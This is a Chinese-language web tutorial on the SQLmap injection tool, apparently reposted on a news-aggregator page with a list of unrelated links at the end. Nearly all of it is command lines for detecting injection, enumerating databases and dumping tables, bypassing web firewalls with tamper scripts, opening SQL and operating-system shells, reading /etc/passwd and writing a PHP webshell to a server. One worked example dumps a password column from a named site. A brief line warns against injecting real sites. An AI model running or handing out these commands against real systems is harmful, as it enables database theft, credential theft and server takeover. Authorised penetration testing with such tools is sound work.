当前位置: 首页 > news >正文

SQLmap的使用

/*不要随意对真实网站注入*/1. 启动 sqlmapWindows假设已安装 Python没下载的话先去下python环境python sqlmap.py这是启动sqlmap工具的命令如果已配置环境变量可以使用sqlmap -h查看帮助。2.检测 GET 注入基本用法sqlmap -u http://example.com/page.php?id1不用引号引起来有可能会有错误-u指定目标 URL自动检测注入点、数据库类型、是否可注入3. 常用参数参数作用用法示例-u目标URL引号-u http://test.com?id1-r请求文件加载-r req.txt--dataPOST方式提交数据--data user1pass2--cookie设置Cookie--cookie PHPSESSIDxxx-p指定测试参数-p id--level测试等级(1-5, 越高测越多)不用的话默认1--level 3--risk风险等级(1-3)--risk 2--batch自动默认选择不询问自动Y--batch--threads并发线程数--threads 104. 获取数据库信息核心流程4.1 枚举数据库sqlmap -u url?id1--dbs4.2 获取当前数据库sqlmap -u url?id1--current-db4.3 枚举指定数据库的表sqlmap -u url?id1-D database_name --tables4.4 枚举指定主句库的表的列sqlmap -u url?id1-D db_name -T table_name --columns4.5 查询表数据sqlmap -u url?id1-D db_name -T table_name --dump可加--start 1 --stop 10只取前10条方便查看5. 实用场景5.1 POST 注入使用--datasqlmap -u http://test.com/login --data useradminpass1235.2 带Cookie/Token推荐用-r先用浏览器抓包复制请求保存为req.txt可在怀疑注入点加*然后sqlmap -r req.txt5.3 绕过WAFsqlmap -u url --tamperbetween,randomcase,space2comment常见tamperspace2commentbetweenrandomcaseversionedkeywords5.4 获取操作系统/数据库交互 shell# SQL shell sqlmap -u url --sql-shell # 操作系统shell需要高权限 sqlmap -u url --os-shell5.5 文件读取/写入# 读取文件 sqlmap -u url --file-read/etc/passwd # 写 webshell sqlmap -u url --file-write shell.php --file-dest /var/www/html/shell.php6. 速查口诀先检测sqlmap -u url看库--dbs看表-D 库名 --tables看列-D 库名 -T 表名 --columns拿数据--dump遇阻碍--cookie/-r/--tamper省心--batch --threads 107. 示例sqlmap -u http://Landi.com/ye.php?id5 --batch --dbs sqlmap -u http://Landi.com/ye.php?id5 -D landi_db --tables --batch sqlmap -u http://Landi.com/ye.php?id5 -D landi_db -T landi_users --columns --batch sqlmap -u http://Landi.com/ye.php?id5 -D landi_db -T landi_users -C password --dump --batch
http://www.zskr.cn/news/1334484.html

相关文章:

  • 2026年专业单槽超声波清洗机哪家强:双槽超声波清洗机/台式超声波焊接机/吻合器超声波焊接机/塑料超声波焊接机/选择指南 - 优质品牌商家
  • 2026年20kHz超声波焊接机技术全解:三槽超声波清洗机/全自动超声波清洗机/全自动超声波焊接机/医用超声波清洗机/选择指南 - 优质品牌商家
  • Linux内核死锁检测利器lockdep:原理、实战与深度调优
  • 【26年社工】初级社会工作者历年真题及答案PDF电子版(2010-2025年)
  • 为什么92%的科技从业者仍在用Google搜AI新闻?Perplexity专属新闻索引架构(含2023-2024爬取覆盖率对比数据)首次披露
  • HP ProLiant MicroServer Gen8 CPU支持列表
  • NY378固态MT29F32T08GSLBHL8-24QA:B
  • 大模型如何推理:从分词到答案一秒之内的旅程
  • 化工自吸泵实测评测:耐酸碱自吸泵/自吸污水泵/自吸离心泵/蒸发强制循环泵/蒸发混流泵/蒸发结晶循环泵/蒸发轴流泵/选择指南 - 优质品牌商家
  • 两个IO口,四根线!51单片机IIC控制LCD1602的究极偷懒方案!!!
  • CAD专业看图师手机版安装使用教程
  • AI Agent 艺术创作能力探索
  • 对你而言, Vibe Coding 的乐趣是什么?
  • 嵌入式Linux设备树:从源码结构到二进制格式的完整解析
  • 肌音信号导向的人体膝关节运动加速度估计方法【附代码】
  • Linux内核同步机制:从原子操作到RCU的实战指南
  • 写给前端的 CANN-ops-transformer:昇腾Transformer进阶算子库到底是啥?
  • 今日份学习51ing
  • 好用的AI论文工具推荐(2026最新版)
  • i.MX 8M Plus核心板多媒体实战测评:硬编解码、多屏显示与ISP调优
  • 如何彻底禁用iOS过热降频:thermalmonitordDisabler终极指南
  • FanControl终极指南:5分钟让你的Windows风扇控制既智能又安静
  • Inter字体终极指南:从零开始掌握现代界面设计的免费开源字体方案
  • 抖音内容采集系统架构设计与工程实践
  • 【限时解密】Perplexity图书评论搜索底层索引逻辑:基于12TB真实评论数据的语义权重分析报告
  • 【Perplexity文学研究黄金配置】:1个提示词模板+2个权威元数据过滤器+4类文学体裁专属指令集
  • 别再死记硬背了!用PADS Layout给0603电阻电容画封装的保姆级避坑指南
  • Midjourney Relax Mode vs. Turbo Mode:性能、出图质量、队列优先级与成本的硬核对比(附实测数据表)
  • 手搓科研绘图依旧很权威,如何快速绘制顶刊论文插图呢?
  • ESP32 EC11编码器控制电机速度?避坑指南:PWM频率、占空比与电机驱动的那些事儿